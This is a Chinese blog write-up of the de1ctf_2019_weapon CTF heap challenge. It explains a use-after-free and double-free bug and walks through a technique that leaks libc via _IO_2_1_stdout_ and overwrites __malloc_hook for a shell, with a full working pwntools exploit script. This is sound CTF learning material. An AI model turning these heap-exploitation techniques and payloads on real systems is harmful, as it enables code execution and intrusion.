de1ctf_2019_weapon(IO_leak,doublefree)

最新推荐文章于 2023-07-10 20:42:26 发布
最新推荐文章于 2023-07-10 20:42:26 发布
阅读量437 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121361905
版权

de1ctf_2019_weapon:

保护全开
请添加图片描述

程序分析:

没法直接申请free到unsotbin中
请添加图片描述
此外,这个程序还没有泄露函数,只能靠IO去leak libc_base了

漏洞分析:

指针未清零,存在uaf
请添加图片描述

利用思路:

1.利用doublefree,伪造个unsortbin大小的chunk,释放到unsortbin中
2.再从unsortbin中割一块,里面的main_arena附近的地址会下移的性质,改到一个已释放的0x60大小的堆的fd(0x60大小是为了后面fastbin_attack),我们顺便在这把main_arena改为_IO_2_1_stdout_处,后面我们要申请堆块到这里,他们只有后四位不同,后三位是620,我们需要爆破一个字节,但实际为了能申请堆块到这里,我们需要找前面的0x7f,来绕过检查,也就是fastbin_attack
3.申请到_IO_2_1_stdout_处后,这么填payload = p64(0xfbad1800)+p64(0)*3+b"\x58" ,之后当程序遇到puts函数时就会打印_IO_write_base到_IO_write_ptr之间的内容,我们就泄露了libc。此外,这样改了后puts就没换行符了
4.泄露libc后,我们计算出one_gadget,利用double free,fastbin_attack申请堆到malloc_hook-0x23处(也是为了0x7f绕过检查),改malloc_hook为one_gadget,再申请就能开shell啦

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './de1ctf_2019_weapon'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',25789 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
#context.log_level = 'debug'
#context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------------
def add(size,index,name):
        sla('choice >> \n','1')
        sla('wlecome input your size of weapon: ',str(size))
        sla('input index: ',str(index))
        sa('input your name:\n',name)
def add2(size,index,name):
        sla('choice >> ','1')
        sla('wlecome input your size of weapon: ',str(size))
        sla('input index: ',str(index))
        sa('input your name:',name)
def delete(index):
        sla('choice >> \n','2')
        sla('input idx :',str(index))
def delete2(index):
        sla('choice >> ','2')
        sla('input idx :',str(index))

def edit(index,content):
        sla('choice >> \n','3')
        sla('input idx: ',str(index))
        sa('new content:\n',content)
def edit2(index,content):
        sla('choice >> ','3')
        sla('input idx: ',str(index))
        sa('new content:',content)
def pwn():
        add(0x50,0,'a'*0x40+p64(0)+p64(0x61))
        add(0x50,1,'aaaa')
        add(0x60,2,'bbbb')
        delete(1)
        delete(0)
        delete(1)
        add(0x50,8,p8(0x50))
        add(0x50,3,p64(0))
        add(0x50,4,p64(0))
        add(0x50,5,p64(0)+p64(0xd1))
        add(0x20,3,'ppp')
        add(0x20,3,'ppp')
        delete(1)
        delete(2)
        add(0x50,7,'aaaa')
        #--------------------
        edit(2,p8(0xdd)+p8(0x25))
        add(0x60,3,'a')
        payload ='a'*0x33+p64(0xfbad1800)+p64(0)*3+b"\x58"
        add(0x60,7,payload)
        #debug()
        libc_base=u64(r.recvuntil("\x7f",timeout=0.1)[-6:].ljust(8,'\x00'))-0x3C56A3
        if (libc_base&0xfff)!=0:
                exit(-1)
        print hex(libc_base)
        malloc_hook = libc_base +0x3c4b10
        one_gadget = o_g_old[3]+libc_base
        system=libc_base+libc.sym['system']
        realloc=libc_base+libc.sym['realloc']
        #----------------------------
        add2(0x60,0,'a')
        add2(0x60,1,'b')
        delete2(0)
        delete2(1)
        delete2(0)
        edit2(0,p64(malloc_hook-0x23))
        add2(0x60,2,p64(0))
        add2(0x60,3,'a'*(0x13)+p64(one_gadget))
        sla('choice >> ','1')
        sla('wlecome input your size of weapon: ',str(0x10))
        sla('input index: ',str(8))
        r.interactive()
#---------------------------------
if __name__ == "__main__":
    while True:
        r = remote('node4.buuoj.cn',26364)
        #r=process('./de1ctf_2019_weapon')
        try:
            pwn()
        except:
            r.close()

其他:

能全靠自己堆出unsortbin和放到0x70的bin链中我还是很开心的,虽然堆了好久。
主要就是远端爆破太慢了,还不容易找出错误在哪,用one_gadget的话,有时还要realloc调整,就更久了
实在就是最好本地先把alsr关了,这样我们试出那个字节后,程序是不会变的,就能一直成功泄露
还有就是libc.sym找出来的偏移是不对的,不知道为什么
记一下gdb调试找偏移:
断点设在发送payload,改了IO_stdout之后
用vmmap看libc基址
脚本里有context.log_level = ‘debug’,能看到
0x7ffff7dd26a3-0x7ffff7a0d000=0x3C56A3

请添加图片描述
还有就是用readelf找偏移= =
请添加图片描述

Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
de1ctf_2019_weapon (IO_FILE)
BengDouLove的博客
05-27 1029
这道题的方法对于我来说有点陌生,堆操作之后利用IO_FILE的相关知识,记录一下,以后还会有更多对于 IO 的利用 保护机制全开,所以常规方法肯定没办法 分析程序: 这是主程序 menu函数 create函数 逻辑是输入申请大小,在输入index,然后就写入chunk 没有任何检查,比如申请过的index不能用之类的 最简洁的申请函数 delete函数 同样是简洁的释放函数,而且有 uaf 漏洞 rename函数 改写chunk内容,写入的时候貌似没有溢出,但是 uaf 能用在这上面 程序看似
de1ctf_2019_weapon
doudoudedi
05-06 705
这题我多了一个换行搞了老久了服了还是tcl 思路 有uaf通过写IO来得到libc地址然后通过double free来拿到shell exp: #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./de1ctf_2019_weapon') p=remote('node3.buuoj.cn',292...
[uaf + double free] de1ctf_2019_weapon
huzai9527的博客
09-22 321
[uaf + double free] de1ctf_2019_weapon 1. ida分析 删除的时候,只是检查了index范围,没有检查是否存在,存在double free 并且free后,指针没有置空,存在uaf 限制了chunk大小,需要通过uaf 构造fake chunk,修改chunk head的大小,构造unstored bin attack 2. 思路 1⃣️申请3个chunk 0,chunk 1,chunk 2,用chunk 0伪造chunk 1 的head,free chunk
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
最新发布
m0_73756460的博客
07-10 242
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
DE1_SoC.zip_DE1_SoC_assignment_de1-soc_verilog
09-24
DE1_SoC.zip_DE1_SoC_assignment_de1-soc_verilog是一个关于DE1_SoC开发板的Verilog引脚分配项目的压缩文件。这个项目主要涉及的是在硬件描述语言Verilog中对DE1_SoC开发板的引脚进行适当地配置和分配。DE1_SoC是一...
DE1_i2sound.rar_ALTERA DE1_DE1 音乐_de1_de1_i2sound
09-23
DE1_i2sound.rar 是一个针对Altera DE1开发板的资源包,主要目标是实现通过DE1平台播放音乐的功能。这个压缩包包含了与DE1开发板上的I2S(Inter-IC Sound)接口相关的软件、硬件设计以及可能的教程资料,帮助用户...
My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps
09-21
标题 "My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps" 暗示了这是一个关于DE1-SOC开发板上实现的"My First HPS"项目,其中HPS代表Hard Processor System(硬处理器系统)。这个项目可能是针对初学者...
DE1_SD_Card_Audio.zip_DE1_SD_CARD_Audio_SD_de1_sd card_sopc
07-15
DE1 Sopc SD card audio
DE1-SoC_v.5.0.1_HWrevF_SystemCD.rar
08-11
DE1-SoC_v.5.0.1_HWrevF_SystemCD是一款由Intel推出的开发板相关的系统光盘资源,主要用于支持开发者在硬件设计和软件开发过程中进行深入学习和实践。这款光盘包含了丰富的资料,旨在帮助用户充分利用DE1-SoC开发板...
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 372
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
lemon(IO_leak)
qq_33590156的博客
12-04 224
分析函数 main 先输入yes可以进一个游戏,因为rand没有用srand进行初始化,所以是一个定值, 这里输入1111,即可进入,然后他会将flag读到栈上,并且泄露flag+0x40的地址后三位。之后开启沙箱,进入堆界面。 add add会先申请一个0x20大小的pre_chunk来管理chunk,并且前0x10可在add时编辑,后0x10写上size和指向chunk的指针。 之后会申请输入大小的chunk,此时如果输入大于0x400,将不会申请chunk,而且会将pre_chunk进行free(但此
IO_FILE——leak 任意读
虚幻私塾
02-23 338
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 在堆题没有show函数时,我们可以用 IO_FILE 进行leak,本文就记录一下如何实现这一手法。 拿一个输出函数 puts 来说,它在源码里的表现形式为 _IO_puts 。 \_IO\_puts (const char *str) { int result = EOF;
De1CTF weapon 经验总结
qq_43189757的博客
10-04 743
第一次接触通过利用_IO_2_1_stdout_ 来泄露libc地址的题目,中间碰到不少问题,在这里记录一下 1.泄露libc 由于程序限制了创建的堆块大小为0x60 以内,所以无法同通过创建一个大小能放入unsortedbin中的堆块,但是可以通过伪造一个大小符合unsortedbin中的堆块来泄露libc地址 具体步骤: 1.创建五个大小为0x20堆块 编号依次为0-5, 之后一次释放chun...
基于linux环境和ethecat的igh库控制汇川620N的主站代码
weixin_42186805的博客
09-15 2609
#include "ecrt.h" #include <stdio.h> #include "ethercatdef.h" #include "initInovance.h" #include <errno.h> #include <signal.h> #include <stdio.h> #include <string.h> #include <sys/resource.h> #include <sys/time.h>.
De1CTF-2019部分wp
CTF小白的博客
08-05 2129
目录Misc1——We1comeMisc2——Mine SweepingWeb1——SSRF MeCrypto1——xorz 去De1CTF划了划水,发现自己是真的菜━┳━ ━┳━ Misc1——We1come https://t.me/De1CTF ,需要加Telegram群,需要VPN,群里有发签到的flag Misc2——Mine Sweeping 下载下来是一个扫雷游戏 在没有雷的地...
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 606
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
De1CTF Weapon(IO_2_1_stdout)
Maxmalloc的博客
08-05 1132
1.保护机制 [*] '/home/yzl/Documents/delta/weapon/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE e...
DE1_SoC FPGA设计入门教程
"SoC-FPGA Design Guide(DE1_SoC).pdf" 是一份英文的SoCFPGA基础开发教程,特别适合初级开发者学习。文档详细介绍了SoCFPGA的设计和DE1_SoC开发板的使用。 在SoCFPGA(System on Chip - Field Programmable Gate ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值